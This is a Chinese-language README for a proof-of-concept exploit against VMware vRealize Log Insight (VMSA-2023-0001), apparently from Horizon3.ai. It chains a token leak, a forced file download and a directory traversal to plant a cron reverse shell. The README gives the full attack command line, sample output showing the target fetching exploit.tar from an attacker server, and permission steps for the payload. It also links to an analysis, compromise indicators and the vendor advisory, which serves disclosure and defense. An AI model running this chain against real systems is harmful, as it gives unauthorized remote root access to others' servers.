针对影响 VMware vRealize Log Insight 的 VMSA-2023-0001 的 POC,包含以下 CVE:
该漏洞的默认配置会写入一个 cron 作业,用于创建反向 shell。请务必修改 payload 文件以适配你的环境。
该漏洞的技术根本原因分析可在我们的博客上找到: https://www.horizon3.ai/vmware-vrealize-log-insight-vmsa-2023-0001-technical-deep-dive
如需分析 Log Insight 实例的失陷指标,请查看我们的 IOC 博客: https://www.horizon3.ai/vmware-vrealize-cve-2022-31706-iocs/
该 POC 滥用各种 Thrift RPC 端点,以实现任意文件写入。
$ python3 VMSA-2023-0001.py --target_address 192.168.4.133 --http_server_address 192.168.4.60 --http_server_port 8080 --payload_file payload --payload_path /etc/cron.d/exploit
[+] Using CVE-2022-31711 to leak node token
[+] Found node token: f261d2f5-71fa-45fd-a0a0-6114a55a8fb8
[+] Using CVE-2022-31704 to trigger malicious file download
192.168.4.133 - - [30/Jan/2023 16:43:41] "GET /exploit.tar HTTP/1.1" 200 -
[+] File successfully downloaded
[+] Using CVE-2022-31706 to trigger directory traversal and write cron reverse shell
[+] Payload successfully delivered
如果使用基于 cron 的 payload,请确保 payload 文件具有适当的权限和所有者:
sudo chown root:root payload
sudo chmod 0644 payload
更新到最新版本,或按照 VMSA 中的说明进行缓解 https://www.vmware.com/security/advisories/VMSA-2023-0001.html
本软件纯粹出于学术研究和开发有效防御技术的目的而创建,除非获得明确授权,否则不应用于攻击系统。项目维护者不对软件的滥用负责或承担责任。请负责任地使用。